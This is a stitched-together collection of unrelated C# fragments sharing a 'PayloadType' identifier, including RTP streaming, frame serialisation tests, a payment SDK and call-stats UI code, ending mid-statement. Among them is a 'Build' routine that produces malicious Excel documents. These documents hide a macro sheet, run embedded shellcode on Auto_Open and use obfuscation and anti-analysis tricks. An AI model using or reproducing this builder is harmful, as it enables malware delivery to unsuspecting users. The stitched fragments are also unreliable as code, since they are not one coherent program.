FrameUtils powriterUtils = new FrameUtils(Command.SUBSCRIBE, 1234); PayloadType potype = new PayloadType(42); PayloadObject poo = new PayloadObject(potype, Encoding.UTF8.GetBytes("testPayload")); powriterUtils.AddPayloadObjectGetUtils(poo); Frame powriterFrame = powriterUtils.Build(); MemoryStream ns2 = new MemoryStream(); Stream bs2 = ns2; powriterFrame.Write(bs2); string poframeRetreived = Encoding.UTF8.GetString(ns2.ToArray()); string poexpectedFrameStr = "subs 0000000000 0000001234\n" + "po :42 11\n" + "testPayload\n" + "end\n"; if (poframeRetreived.Equals(poexpectedFrameStr)) { Console.WriteLine("Writing PO test: They are equal."); } //Testing Writing RoutingObject Console.WriteLine(""); Console.WriteLine("Testing Writing RoutingObject:"); FrameUtils rowriterUtils = new FrameUtils(Command.PUBLISH, 9876); RoutingObject ro = new RoutingObject(45, Encoding.UTF8.GetBytes("relaxing")); rowriterUtils.AddRoutingObjectGetUtils(ro); Frame rowriterFrame = rowriterUtils.Build(); MemoryStream ns3 = new MemoryStream(); Stream bs3 = ns3; rowriterFrame.Write(bs3); string roframeRetreived = Encoding.UTF8.GetString(ns3.ToArray()); string roexpectedFrameStr = "publ 0000000000 0000009876\n" + "ro 45 8\n" + "relaxing\n" + "end\n"; if (roframeRetreived.Equals(roexpectedFrameStr)) { Console.WriteLine("Writing RO test: They are equal."); } //Reading RoutingObject Frame Console.WriteLine(""); Console.WriteLine("Testing Reading RoutingObject Frame:"); string roframetoread = "dlpc 0000000987 0000000645\n" + "ro 255 6\n" + "testRO\n" + "end\n"; byte[] roframeBytes = Encoding.UTF8.GetBytes(roframetoread); MemoryStream roStream = new MemoryStream(roframeBytes); Frame roFrame = Frame.ReadFromStream(roStream); Console.WriteLine("Command: " + Command.DEL_PREF_CHAIN + " = " + roFrame.command); Console.WriteLine("Sequence number: " + "645" + " = " + roFrame.sequenceNumber); Console.WriteLine("VSkeyPairCount: " + "0" + " = " + roFrame.vsKeyPairs.Count); Console.WriteLine("RoutinObjects.Count: 1" + " = " + roFrame.routingObjects.Count); Console.WriteLine("PayloadObjects.Count: 0" + " = " + roFrame.payloadObjects.Count); //Readin PayloadObject Frame Console.WriteLine(""); Console.WriteLine("Testing Reading PayloadObject Frame:"); string poframetoread = "make 0000000059 0000000999\n" + "po 11\n" + "testPayload\n" + "end\n"; byte[] poframeBytes = Encoding.UTF8.GetBytes(poframetoread); MemoryStream mempo = new MemoryStream(poframeBytes); Frame mepoframe = Frame.ReadFromStream(mempo); Console.WriteLine("Command: " + Command.MAKE_ENTITY + " = " + mepoframe.command); Console.WriteLine("Sequence number: " + "999" + " = " + mepoframe.sequenceNumber); Console.WriteLine("VSkeyPairCount: " + "0" + " = " + mepoframe.vsKeyPairs.Count); Console.WriteLine("RoutinObjects.Count: 0" + " = " + mepoframe.routingObjects.Count); Console.WriteLine("PayloadObjects.Count: 1" + " = " + mepoframe.payloadObjects.Count); PayloadType expectedType = new PayloadType(new byte[] { 1, 2, 3, 4 }); byte[] expectedContents = Encoding.UTF8.GetBytes("testPayload"); PayloadObject expectedPayload = new PayloadObject(expectedType, expectedContents); if (expectedPayload.Equals(mepoframe.payloadObjects[0])) { Console.WriteLine("Readin PO test: They are equal."); } }
//public byte[] EventPayload //{ // get // { // using (MemoryStream ms = new MemoryStream()) // { // using (BinaryWriter writer = new BinaryWriter(ms)) // { // this.Serialize(writer); // } // return ms.ToArray(); // } // } //} //public static Payload CreateInstance(byte[] eventPayload) //{ // if (eventPayload.Length == 0) // { // throw new ArgumentException("Event payload is empty", "eventPayload"); // } // PayloadType eventType = (PayloadType)eventPayload[0]; // Payload eventData = null; // switch (eventType) // { // case PayloadType.CollectionOpened: // eventData = new CollectionOpenedPayload(eventPayload); // break; // case PayloadType.ObjectOpened: // eventData = new ObjectOpenedPayload(eventPayload); // break; // case PayloadType.ObjectDeleted: // eventData = new ObjectDeletedPayload(eventPayload); // break; // case PayloadType.ObjectClosed: // eventData = new ObjectClosedPayload(eventPayload); // break; // case PayloadType.ObjectConnected: // eventData = new ObjectConnectedPayload(eventPayload); // break; // case PayloadType.CollectionDeleted: // eventData = new CollectionDeletedPayload(eventPayload); // break; // case PayloadType.Object: // eventData = new ObjectPayload(eventPayload); // break; // case PayloadType.ObjectInserted: // eventData = new ObjectInsertedPayload(eventPayload); // break; // case PayloadType.ObjectRemoved: // eventData = new ObjectRemovedPayload(eventPayload); // break; // case PayloadType.PropertyUpdated: // eventData = new PropertyChangedPayload(eventPayload); // break; // case PayloadType.RegisterClient: // eventData = new ClientConnectPayload(eventPayload); // break; // case PayloadType.RegisterPrincipal: // eventData = new RegisterPrincipalPayload(eventPayload); // break; // case PayloadType.CollectionConnected: // eventData = new CollectionConnectedPayload(eventPayload); // break; // case PayloadType.CollectionClosed: // eventData = new CollectionClosedPayload(eventPayload); // break; // case PayloadType.SingletonInitialized: // eventData = new SingletonInitializedPayload(eventPayload); // break; // case PayloadType.ObjectError: // eventData = new ObjectErrorPayload(eventPayload); // break; // case PayloadType.ObjectPropertyError: // eventData = new ObjectPropertyErrorPayload(eventPayload); // break; // case PayloadType.Error: // eventData = new ErrorPayload(eventPayload); // break; // case PayloadType.Trace: // eventData = new TracePayload(eventPayload); // break; // case PayloadType.ServerCommand: // eventData = new ServerCommandPayload(eventPayload); // break; // case PayloadType.AtomicOperation: // eventData = new AtomicPayload(eventPayload); // break; // case PayloadType.UnauthorizedError: // eventData = new UnauthorizedErrorPayload(eventPayload); // break; // case PayloadType.ObjectSecurity: // eventData = new SharedObjectSecurityPayload(eventPayload); // break; // case PayloadType.DirectMessage: // eventData = new MessagePayload(eventPayload); // break; // case PayloadType.CollectionHeartbeat: // eventData = new CollectionHeartbeatPayload(eventPayload); // break; // case PayloadType.EvictionPolicy: // eventData = new EvictionPolicyPayload(eventPayload); // break; // default: // throw new InvalidOperationException("Unknown EventLinkDataType"); // } // return eventData; //} //private ushort GenerateId() //{ // ushort id = payloadSequenceId; // payloadSequenceId++; // // The max value is reserved for internal constructors to specify to the payload constructor // // that they want an auto generated payload id, so we skip over that number in the sequence // if (payloadSequenceId == ushort.MaxValue) // { // payloadSequenceId = 0; // } // return id; //} /// <summary> /// Used by serializer /// </summary> /// TODO FIX BACK TO PROTECTED IL2JS //public Payload2() // : this(PayloadType.Undetermined) //{ //} public Payload2(PayloadType eventType) { this.EventType = eventType; //this.PayloadId = GenerateId(); }
public PayloadChannel(PayloadType pType) { fPayloadType = pType; }
public Payload(string content) { _strContent = content; _type = PayloadType.String; _size = content.Length; }
public static String payloadHeader(PayloadType type) { switch (type) { case PayloadType.Altitude: return "ALT"; case PayloadType.Apoapsis: return "APA"; case PayloadType.Apoapsis_r: return "APR"; case PayloadType.Orb_spd: return "OSP"; case PayloadType.Periapsis: return "PEA"; case PayloadType.Periapsis_r: return "PER"; case PayloadType.Stage: return "STG"; case PayloadType.Surf_spd: return "SSP"; case PayloadType.T_t_apo: return "TTA"; case PayloadType.T_t_peri: return "TTP"; case PayloadType.Targ_dist: return "TDI"; case PayloadType.Targ_spd: return "TSP"; case PayloadType.SOI_Num: return "SOI"; case PayloadType.Latitude: return "LAT"; case PayloadType.Longitude: return "LON"; case PayloadType.Orbital_period: return "OPE"; case PayloadType.Gee_force: return "GFO"; case PayloadType.Terrain_altitude: return "AGL"; default: return "INV"; } }
public Payload(FileStream file) { _fileContent = file; _type = PayloadType.File; _size = file.Length; }
/// <summary> /// Get whether the individual property is a single primitive type. /// </summary> /// <param name="responsePayload">the string of the response payload.</param> /// <param name="payloadType">the type of the response payload.</param> /// <returns>True, if the the individual property is a single primitive type; false otherwise. </returns> public static bool IsIndividualPropertySinglePrimitiveType( string responsePayload, PayloadType payloadType) { if (payloadType != PayloadType.IndividualProperty || string.IsNullOrEmpty(responsePayload)) return false; XmlDocument xmlDoc = new XmlDocument(); xmlDoc.LoadXml(responsePayload); XmlElement root = xmlDoc.DocumentElement; if (root.LocalName.Equals("value") && root.NamespaceURI.Equals(Constants.NSMetadata)) { if (root.Attributes["context", Constants.NSMetadata] != null) { string contextURI = root.Attributes["context", Constants.NSMetadata].Value; string propertyType = contextURI.Remove(0, contextURI.IndexOf('#') + 1); if (propertyType.Contains("Collection(")) return false; } if (root.Attributes["type", Constants.NSMetadata] != null) { string typeName = root.Attributes["type", Constants.NSMetadata].Value; if (!typeName.Contains(".")) { typeName = "Edm." + typeName; } if (EdmTypeManager.IsEdmSimpleType(typeName)) { return true; } } else { return true; } } return false; }
internal static Frame MessageToFrame(ulong conversationId, string methodName, PayloadType type, IMessage payload, IBonded layerData, Logger logger) { var frame = new Frame(logger); { var headers = new EpoxyHeaders { conversation_id = conversationId, payload_type = type, method_name = methodName ?? string.Empty, // method_name is not nullable }; if (payload.IsError) { headers.error_code = payload.Error.Deserialize <Error>().error_code; } else { headers.error_code = (int)ErrorCode.OK; } const int initialHeaderBufferSize = 150; var outputBuffer = new OutputBuffer(initialHeaderBufferSize); var fastWriter = new FastBinaryWriter <OutputBuffer>(outputBuffer); Serialize.To(fastWriter, headers); frame.Add(new Framelet(FrameletType.EpoxyHeaders, outputBuffer.Data)); } if (layerData != null) { const int initialLayerDataBufferSize = 150; var outputBuffer = new OutputBuffer(initialLayerDataBufferSize); var compactWriter = new CompactBinaryWriter <OutputBuffer>(outputBuffer); // TODO: See TODO below about issues with IBonded Marshal.TO(...) compactWriter.WriteVersion(); layerData.Serialize(compactWriter); frame.Add(new Framelet(FrameletType.LayerData, outputBuffer.Data)); } { var userData = payload.IsError ? (IBonded)payload.Error : (IBonded)payload.RawPayload; const int initialPayloadBufferSize = 1024; var outputBuffer = new OutputBuffer(initialPayloadBufferSize); var compactWriter = new CompactBinaryWriter <OutputBuffer>(outputBuffer); // TODO: marshal dies on IBonded Marshal.To(compactWriter, request) // understand more deeply why and consider fixing compactWriter.WriteVersion(); userData.Serialize(compactWriter); frame.Add(new Framelet(FrameletType.PayloadData, outputBuffer.Data)); } return(frame); }
internal RtpSender(IRtpSession rtpSession, string name, PayloadType payloadType, Hashtable priExns, Hashtable paraPay) { if(Thread.CurrentThread.Name == null) { Thread.CurrentThread.Name = "RtpSender - " + name; } this.rtpSession = rtpSession; this.payloadType = payloadType; this.payloadPara = paraPay; // Leave everything but CName and Name blank in order to reduce Rtcp bandwidth sdes = new SdesData(rtpSession.Sdes.CName, name); // Add private extensions sdes.SetPrivateExtension(Rtcp.PEP_SOURCE, Rtcp.PED_STREAM); sdes.SetPrivateExtension(Rtcp.PEP_PAYLOADTYPE, ((int)payloadType).ToString()); InitializeNetwork(); InitializeFrame(); InitializePerformanceCounters(); // This needs to be called after InitializeNetwork if( priExns != null ) { foreach(DictionaryEntry de in priExns) { sdes.SetPrivateExtension((string)de.Key, (string)de.Value); } string dbpString = (string)priExns[Rtcp.PEP_DBP]; if( dbpString != null ) DelayBetweenPackets = short.Parse(dbpString); } ResetState(); }
/*private void cm_ContactFound(object sender, ContactFoundEventArgs e) * { * if (e.ContactFound != null) * { * Contact.Text = e.ContactFound.DisplayName; * if (e.PhoneLabel != null) * { * Number.Text = e.PhoneLabel + " : " + e.PhoneNumber; * } * else * { * Number.Text = e.PhoneNumber; * } * } * }*/ private void timerTick(Object sender, Object e) { Call call = ((InCallModel)this.DataContext).GetCurrentCall(); if (call == null) { return; } //startTime = (DateTimeOffset)call.CallStartTimeFromContext; TimeSpan callDuration = new TimeSpan(call.Duration * TimeSpan.TicksPerSecond); var hh = callDuration.Hours; var ss = callDuration.Seconds; var mm = callDuration.Minutes; Status.Text = hh.ToString("00") + ":" + mm.ToString("00") + ":" + ss.ToString("00"); string audioPayloadType = ""; string audioDownloadBandwidth = ""; string audioUploadBandwidth = ""; string videoPayloadType = ""; string videoDownloadBandwidth = ""; string videoUploadBandwidth = ""; CallParams param = call.CurrentParams; ((InCallModel)this.DataContext).MediaEncryption = param.MediaEncryption.ToString(); CallStats audioStats = null; try { audioStats = call.GetStats(StreamType.Audio); } catch { } if (audioStats != null) { audioDownloadBandwidth = String.Format("{0:0.00}", audioStats.DownloadBandwidth); audioUploadBandwidth = String.Format("{0:0.00}", audioStats.UploadBandwidth); ((InCallModel)this.DataContext).ICE = audioStats.IceState.ToString(); } PayloadType audiopt = param.UsedAudioPayloadType; if (audiopt != null) { audioPayloadType = audiopt.MimeType + "/" + audiopt.ClockRate; } if (param.VideoEnabled) { CallStats videoStats = call.GetStats(StreamType.Video); if (videoStats != null) { videoDownloadBandwidth = String.Format("{0:0.00}", videoStats.DownloadBandwidth); videoUploadBandwidth = String.Format("{0:0.00}", videoStats.UploadBandwidth); } PayloadType videopt = param.UsedVideoPayloadType; if (videopt != null) { videoPayloadType = videopt.MimeType; } VideoDefinition receivedVideoSize = param.ReceivedVideoDefinition; String NewReceivedVideoSize = String.Format("{0}x{1}", receivedVideoSize.Width, receivedVideoSize.Height); String OldReceivedVideoSize = ((InCallModel)this.DataContext).ReceivedVideoSize; if (OldReceivedVideoSize != NewReceivedVideoSize) { ((InCallModel)this.DataContext).ReceivedVideoSize = String.Format("{0}x{1}", receivedVideoSize.Width, receivedVideoSize.Height); ((InCallModel)this.DataContext).IsVideoActive = false; if (NewReceivedVideoSize != "0x0") { ((InCallModel)this.DataContext).IsVideoActive = true; } } VideoDefinition sentVideoSize = param.SentVideoDefinition; ((InCallModel)this.DataContext).SentVideoSize = String.Format("{0}x{1}", sentVideoSize.Width, sentVideoSize.Height); ((InCallModel)this.DataContext).VideoStatsVisibility = Visibility.Visible; } else { ((InCallModel)this.DataContext).VideoStatsVisibility = Visibility.Collapsed; } string downloadBandwidth = audioDownloadBandwidth; if ((downloadBandwidth != "") && (videoDownloadBandwidth != "")) { downloadBandwidth += " - "; } if (videoDownloadBandwidth != "") { downloadBandwidth += videoDownloadBandwidth; } ((InCallModel)this.DataContext).DownBandwidth = String.Format("{0} kb/s", downloadBandwidth); string uploadBandwidth = audioUploadBandwidth; if ((uploadBandwidth != "") && (videoUploadBandwidth != "")) { uploadBandwidth += " - "; } if (videoUploadBandwidth != "") { uploadBandwidth += videoUploadBandwidth; } ((InCallModel)this.DataContext).UpBandwidth = String.Format("{0} kb/s", uploadBandwidth); string payloadType = audioPayloadType; if ((payloadType != "") && (videoPayloadType != "")) { payloadType += " - "; } if (videoPayloadType != "") { payloadType += videoPayloadType; } ((InCallModel)this.DataContext).PayloadType = payloadType; }
internal RtpSenderFec(IRtpSession session, string name, PayloadType pt, Hashtable priExns, Hashtable paraPay) : base(session, name, pt, priExns, paraPay) {}
internal static extern ErrorCode CionPayloadCreate(out PayloadSafeHandle payload, PayloadType type);
internal static RtpSender CreateInstance(IRtpSession session, string name, PayloadType pt, Hashtable priExns, ushort cDataPx, ushort cFecPx) { // Validate before adding to private extensions if(cFecPx == 0) { throw new ArgumentOutOfRangeException("cFecPx", cFecPx, "Must be >= 1"); } // Add the relevant private extension for FEC Hashtable fecExns = null; if(priExns != null) { fecExns = (Hashtable)priExns.Clone(); } else { fecExns = new Hashtable(); } fecExns[Rtcp.PEP_FEC] = cDataPx.ToString() + ":" + cFecPx.ToString(); // Call generic class factory return CreateInstance(session, name, pt, fecExns, null); }
internal static extern ErrorCode CionPayloadGetType(IntPtr payload, out PayloadType type);
/// <summary> /// Creates a basic RtpSender /// /// This RtpSender simply sends data over the wire. It uses the least amount of CPU and /// network bandwidth at the cost of reliability (i.e. it makes no attempts to improve data /// arrival at the remote site). /// </summary> /// <param name="Name">string Friendly Name of the device/sender of this RtpStream</param> /// <param name="payloadType">Rtp Payload Type</param> /// <param name="priExns">Private extensions for this RtpSender/Stream</param> public RtpSender CreateRtpSender(string name, PayloadType pt, Hashtable priExns) { ValidateRtpTraffic(); RtpSender rtpSender = RtpSender.CreateInstance(this, name, pt, priExns); _CreateRtpSender(rtpSender); return rtpSender; }
/// <summary> /// Generate an Excel Document with a hidden macro sheet that will execute code described by the payload argument. /// </summary> /// <param name="decoyDocument">File path to the base Excel 2003 sheet that should be visible to users.</param> /// <param name="payload">Either binary shellcode or a newline separated list of Excel Macros to execute</param> /// <param name="payload64Bit">Binary shellcode of a 64bit payload, payload-type must be Shellcode</param> /// <param name="payloadType">Specify if the payload is binary shellcode or a macro list. Defaults to Shellcode</param> /// <param name="preamble">Preamble macro code to include with binary shellcode payload type</param> /// <param name="macroSheetName">The name that should be used for the macro sheet. Defaults to Sheet2</param> /// <param name="outputFileName">The output filename used for the generated document. Defaults to output.xls</param> /// <param name="debugMode">Set this to true to make the program wait for a debugger to attach. Defaults to false</param> /// <param name="payloadMethod">How should shellcode be written in the document. Defaults to using the SheetPackingMethod for encoding.</param> /// <param name="password">Password to encrypt document using XOR Obfuscation.</param> /// <param name="method">Which method to use for obfuscating macros. Defaults to ObfuscatedCharFunc. </param> /// <param name="localizedLabel">Use this flag in order to set a localized label in case Excel is not in US language. Default to Auto_Open</param> public static void Build(FileInfo decoyDocument, FileInfo payload, FileInfo payload64Bit, string preamble, PayloadType payloadType = PayloadType.Shellcode, string macroSheetName = "Sheet2", string outputFileName = "output.xls", bool debugMode = false, SheetPackingMethod method = SheetPackingMethod.ObfuscatedCharFunc, PayloadPackingMethod payloadMethod = PayloadPackingMethod.MatchSheetPackingMethod, string password = "", string localizedLabel = "Auto_Open") { if (decoyDocument == null || payload == null) { Console.WriteLine("decoy-document and payload must be specified in Build mode. Run build -h for usage instructions."); return; } //Useful for remote debugging if (debugMode) { Console.WriteLine("Waiting for debugger to attach"); while (!Debugger.IsAttached) { Thread.Sleep(100); } Console.WriteLine("Debugger attached"); } List <BiffRecord> defaultMacroSheetRecords = GetDefaultMacroSheetRecords(); string decoyDocPath = decoyDocument.FullName; WorkbookStream wbs = LoadDecoyDocument(decoyDocPath); List <string> sheetNames = wbs.GetAllRecordsByType <BoundSheet8>().Select(bs => bs.stName.Value).ToList(); VBAInfo vbaInfo = VBAInfo.FromCompoundFilePath(decoyDocPath, sheetNames); List <string> preambleCode = new List <string>(); if (preamble != null) { string preambleCodePath = new FileInfo(preamble).FullName; preambleCode = new List <string>(File.ReadAllLines(preambleCodePath)); } WorkbookEditor wbe = new WorkbookEditor(wbs); wbe.AddMacroSheet(defaultMacroSheetRecords, macroSheetName, BoundSheet8.HiddenState.SuperHidden); List <string> macros = null; byte[] binaryPayload = null; byte[] binary64Payload = null; //TODO make this customizable int rwStart = 0; int colStart = 0xA0; int dstRwStart = 0; int dstColStart = 0; int curRw = rwStart; int curCol = colStart; switch (payloadType) { case PayloadType.Shellcode: macros = MacroPatterns.GetX86GetBinaryLoaderPattern(preambleCode, macroSheetName); binaryPayload = File.ReadAllBytes(payload.FullName); if (payload64Bit != null && payload64Bit.Exists) { binary64Payload = File.ReadAllBytes(payload64Bit.FullName); } break; case PayloadType.Macro: macros = MacroPatterns.ImportMacroPattern(File.ReadAllLines(payload.FullName).ToList()); //Prepend the preamble to the imported pattern macros = preambleCode.Concat(macros).ToList(); break; default: throw new ArgumentException(string.Format("Invalid PayloadType {0}", payloadType), "payloadType"); } if (binaryPayload != null && binaryPayload.Length > 0) { if (payloadMethod == PayloadPackingMethod.Base64) { wbe.SetMacroBinaryContent(binaryPayload, 0, dstColStart + 1, 0, 0, method, payloadMethod); } else { wbe.SetMacroBinaryContent(binaryPayload, curRw, curCol, dstRwStart, dstColStart + 1, method); } curRw = wbe.WbStream.GetFirstEmptyRowInColumn(colStart) + 1; if (rwStart > 0xE000) { curRw = 0; curCol += 1; } if (binary64Payload != null && binary64Payload.Length > 0) { if (payloadMethod == PayloadPackingMethod.Base64) { wbe.SetMacroBinaryContent(binary64Payload, 0, dstColStart + 2, 0, 0, method, payloadMethod); } else { wbe.SetMacroBinaryContent(binary64Payload, curRw, curCol, dstRwStart, dstColStart + 2, method); } curRw = wbe.WbStream.GetFirstEmptyRowInColumn(colStart) + 1; if (rwStart > 0xE000) { curRw = 0; curCol += 1; } macros = MacroPatterns.GetMultiPlatformBinaryPattern(preambleCode, macroSheetName); } if (payloadMethod == PayloadPackingMethod.Base64) { macros = MacroPatterns.GetBase64DecodePattern(preambleCode); } } wbe.SetMacroSheetContent(macros, curRw, curCol, dstRwStart, dstColStart, method); // Initialize the Global Stream records like SupBook + ExternSheet wbe.InitializeGlobalStreamLabels(); if (method == SheetPackingMethod.CharSubroutine || method == SheetPackingMethod.AntiAnalysisCharSubroutine) { ushort charInvocationRw = 0xefff; ushort charInvocationCol = 0x9f; wbe.AddLabel("\u0000", charInvocationRw, charInvocationCol, true, true); //Abuse a few comparison "features" in Excel //1. Null bytes are ignored at the beginning and start of a label. //2. Comparisons are not case sensitive, A vs a or Ḁ vs ḁ //3. Unicode strings can be "decomposed" - ex: Ḁ (U+1E00) can become A (U+0041) - ◌̥ (U+0325) //4. The Combining Grapheme Joiner (U+034F) unicode symbol is ignored at any location in the string in SET.NAME functions wbe.AddLabel(UnicodeHelper.UnicodeArgumentLabel, null, true, true); //Using lblIndex 2, since that what var has set for us wbe.AddFormula( FormulaHelper.CreateCharInvocationFormulaForLblIndex(charInvocationRw, charInvocationCol, 2), payloadMethod); } else if (method == SheetPackingMethod.ArgumentSubroutines) { ushort charInvocationRw = 0xefff; ushort charInvocationCol = 0x9f; ushort formInvocationRw = 0xefff; ushort formInvocationCol = 0x9e; ushort evalFormInvocationRw = 0xefff; ushort evalFormInvocationCol = 0x9d; //Lbl1 wbe.AddLabel("c", charInvocationRw, charInvocationCol, false, false); //Lbl2 wbe.AddLabel("f", formInvocationRw, formInvocationCol, false, false); //Lbl3 wbe.AddLabel(UnicodeHelper.CharFuncArgument1Label, null, false, true); //Lbl4 wbe.AddLabel(UnicodeHelper.FormulaFuncArgument1Label, null, false, true); //Lbl5 wbe.AddLabel(UnicodeHelper.FormulaFuncArgument2Label, null, false, true); //Lbl6 wbe.AddLabel("e", evalFormInvocationRw, evalFormInvocationCol, false, false); //Lbl7 wbe.AddLabel(UnicodeHelper.FormulaEvalArgument1Label, null, false, true); List <Formula> charFunctionFormulas = FormulaHelper.CreateCharFunctionWithArgsForLbl(charInvocationRw, charInvocationCol, 3, UnicodeHelper.CharFuncArgument1Label); foreach (var f in charFunctionFormulas) { wbe.AddFormula(f, payloadMethod); } List <Formula> formulaFunctionFormulas = FormulaHelper.CreateFormulaInvocationFormulaForLblIndexes( formInvocationRw, formInvocationCol, UnicodeHelper.FormulaFuncArgument1Label, UnicodeHelper.FormulaFuncArgument2Label, 4, 5); foreach (var f in formulaFunctionFormulas) { wbe.AddFormula(f, payloadMethod); } List <Formula> formulaEvalFunctionFormulas = FormulaHelper.CreateFormulaEvalInvocationFormulaForLblIndexes( evalFormInvocationRw, evalFormInvocationCol, UnicodeHelper.FormulaEvalArgument1Label, 7); foreach (var f in formulaEvalFunctionFormulas) { wbe.AddFormula(f, payloadMethod); } } wbe.AddLabel(localizedLabel, rwStart, colStart); wbe.ObfuscateAutoOpen(localizedLabel); WorkbookStream createdWorkbook = wbe.WbStream; if (!string.IsNullOrEmpty(password)) { Console.WriteLine("Encrypting Document with Password " + password); XorObfuscation xorObfuscation = new XorObfuscation(); createdWorkbook = xorObfuscation.EncryptWorkbookStream(createdWorkbook, password); // createdWorkbook = createdWorkbook.FixBoundSheetOffsets(); } ExcelDocWriter writer = new ExcelDocWriter(); string outputPath = AssemblyDirectory + Path.DirectorySeparatorChar + outputFileName; Console.WriteLine("Writing generated document to {0}", outputPath); writer.WriteDocument(outputPath, createdWorkbook, vbaInfo); }
public virtual void RemoveCompressor(PayloadType payload) { RemoveCompressor(); }
public virtual void RemoveRenderer(PayloadType payload) { RemoveRenderer(); }
/// <summary> /// Core implementation of processMethod. Retrieves a generic type. /// </summary> /// <typeparam name="T">Generic type that will return.</typeparam> /// <param name="clazz">Type of Class we are using.</param> /// <param name="resource">Resource we will use and return in the implementation.</param> /// <param name="methodName">The name of the method we are trying to call.</param> /// <param name="parameters">Parameters to use in the process.</param> /// <param name="useCache">Cache configuration.</param> /// <param name="requestOptions">Object containing the request options.</param> /// <returns>Generic type object, containing information about retrieval process.</returns> protected static T ProcessMethod <T>(Type clazz, T resource, string methodName, Dictionary <string, string> parameters, bool useCache, MPRequestOptions requestOptions) where T : MPBase { if (resource == null) { try { resource = (T)Activator.CreateInstance(clazz); } catch (Exception ex) { throw new MPException(ex.Message); } } var clazzMethod = GetAnnotatedMethod(clazz, methodName); var restData = GetRestInformation(clazzMethod); HttpMethod httpMethod = (HttpMethod)restData["method"]; PayloadType payloadType = (PayloadType)restData["payloadType"]; JObject payload = GeneratePayload(httpMethod, resource); if (requestOptions == null) { int requestTimeout = (int)restData["requestTimeout"]; int retries = (int)restData["retries"]; requestOptions = new MPRequestOptions { Retries = retries, Timeout = requestTimeout }; } string path = ParsePath(restData["path"].ToString(), parameters, resource, requestOptions); MPAPIResponse response = CallAPI(httpMethod, path, payloadType, payload, useCache, requestOptions); if (response.StatusCode >= 200 && response.StatusCode < 300) { if (httpMethod != HttpMethod.DELETE) { resource = (T)FillResourceWithResponseData(resource, response); resource._lastApiResponse = response; } else { resource = null; } } else if (response.StatusCode >= 400 && response.StatusCode < 500) { BadParamsError badParamsError = MPCoreUtils.GetBadParamsError(response.StringResponse); resource.Errors = badParamsError; } else { MPException webserverError = new MPException() { StatusCode = response.StatusCode, ErrorMessage = response.StringResponse }; webserverError.Cause.Add(response.JsonObjectResponse.ToString()); throw webserverError; } return(resource); }
/// <summary> /// Create a request to use in the call to a certain endpoint. /// </summary> /// <returns>Api response with the result of the call.</returns> public MPRequest CreateRequest(HttpMethod httpMethod, string path, PayloadType payloadType, JObject payload, MPRequestOptions requestOptions) { if (string.IsNullOrEmpty(path)) throw new MPRESTException("Uri can not be an empty string."); if (httpMethod.Equals(HttpMethod.GET)) { if (payload != null) { throw new MPRESTException("Payload not supported for this method."); } } else if (httpMethod.Equals(HttpMethod.POST)) { //if (payload == null) //{ // throw new MPRESTException("Must include payload for this method."); //} } else if (httpMethod.Equals(HttpMethod.PUT)) { if (payload == null) { throw new MPRESTException("Must include payload for this method."); } } else if (httpMethod.Equals(HttpMethod.DELETE)) { if (payload != null) { throw new MPRESTException("Payload not supported for this method."); } } MPRequest mpRequest = new MPRequest(); mpRequest.Request = (HttpWebRequest)HttpWebRequest.Create(path); mpRequest.Request.Method = httpMethod.ToString(); if (requestOptions == null) { requestOptions = new MPRequestOptions(); } if (requestOptions.Timeout > 0) { mpRequest.Request.Timeout = requestOptions.Timeout; } mpRequest.Request.Headers.Add("x-product-id", SDK.ProductId); mpRequest.Request.Headers.Add("x-tracking-id", SDK.TrackingId); if (requestOptions.CustomHeaders != null) { foreach (var header in requestOptions.CustomHeaders) { if (mpRequest.Request.Headers[header.Key] == null) { mpRequest.Request.Headers.Add(header.Key, header.Value); } } } if (requestOptions.TrackHeaders != null) { foreach (var trackHeader in requestOptions.TrackHeaders) { if (mpRequest.Request.Headers[trackHeader.Key] == null && trackHeader.Value != null) { mpRequest.Request.Headers[trackHeader.Key] = trackHeader.Value; } } } if (payload != null) // POST & PUT { byte[] data = null; if (payloadType != PayloadType.JSON) { var parametersDict = payload.ToObject<Dictionary<string, string>>(); StringBuilder parametersString = new StringBuilder(); parametersString.Append(string.Format("{0}={1}", parametersDict.First().Key, parametersDict.First().Value)); parametersDict.Remove(parametersDict.First().Key); foreach (var value in parametersDict) { parametersString.Append(string.Format("&{0}={1}", value.Key, value.Value.ToString())); } data = Encoding.UTF8.GetBytes(parametersString.ToString()); } else { data = Encoding.UTF8.GetBytes(payload.ToString()); } mpRequest.Request.UserAgent = "MercadoPago DotNet SDK/" + SDK.Version; mpRequest.Request.ContentLength = data.Length; mpRequest.Request.ContentType = payloadType == PayloadType.JSON ? "application/json" : "application/x-www-form-urlencoded"; mpRequest.RequestPayload = data; } IWebProxy proxy = requestOptions.Proxy != null ? requestOptions.Proxy : (_proxy != null ? _proxy : SDK.Proxy); mpRequest.Request.Proxy = proxy; return mpRequest; }
/// <summary> /// Remove the renderer for the branch of the graph corresponding to the specified payload /// </summary> /// <param name="payload"></param> public override void RemoveRenderer(PayloadType payload) { if (dvSplitter != null) { if (payload == PayloadType.dynamicAudio) { if (audioCompressor == null) { RemoveFiltersDownstreamFromPin(splitterAudioOut); } else { RemoveFiltersDownstreamFrom(audioCompressor); } } else if (payload == PayloadType.dynamicVideo) { if (videoCompressor == null) { RemoveFiltersDownstreamFromPin(splitterVideoOut); } else { RemoveFiltersDownstreamFrom(videoCompressor); } } } }
/// <summary> /// Build a graph with sampleGrabber. Render it, and get the media type. /// </summary> /// <param name="payload"></param> /// <returns></returns> public bool Build(PayloadType payload, RtpStream newStream) { this.stream = newStream; this.ssrc = newStream.SSRC; //Required as of RC3: this.stream.IsUsingNextFrame = true; if ((ssrc == 0) || !((payload == PayloadType.dynamicVideo) || (payload == PayloadType.dynamicAudio))) { errorMsg = "Invalid inputs to build method."; return(false); } fgm = new FilgraphManagerClass(); MSR.LST.MDShow.IBaseFilter bfSource = null; IGraphBuilder iGB = (IGraphBuilder)fgm; //if (false) // rotnum = FilterGraph.AddToRot(iGB); //AddToRot(iGB); try { bfSource = RtpSourceClass.CreateInstance(); ((MSR.LST.MDShow.Filters.IRtpSource)bfSource).Initialize(this.stream); iGB.AddFilter(bfSource, "RtpSource"); MSR.LST.MDShow.IPin sourceOutput = Filter.GetPin(bfSource, _PinDirection.PINDIR_OUTPUT, Guid.Empty, Guid.Empty, false, 0); //Add SampleGrabber filter MSR.LST.MDShow.IBaseFilter bfGrabber = SampleGrabberClass.CreateInstance(); iGB.AddFilter(bfGrabber, "Grabber"); UW.CSE.MDShow.ISampleGrabber sgGrabber = (UW.CSE.MDShow.ISampleGrabber)bfGrabber; //Set mediatype UW.CSE.MDShow._AMMediaType mt = new UW.CSE.MDShow._AMMediaType(); if (payload == 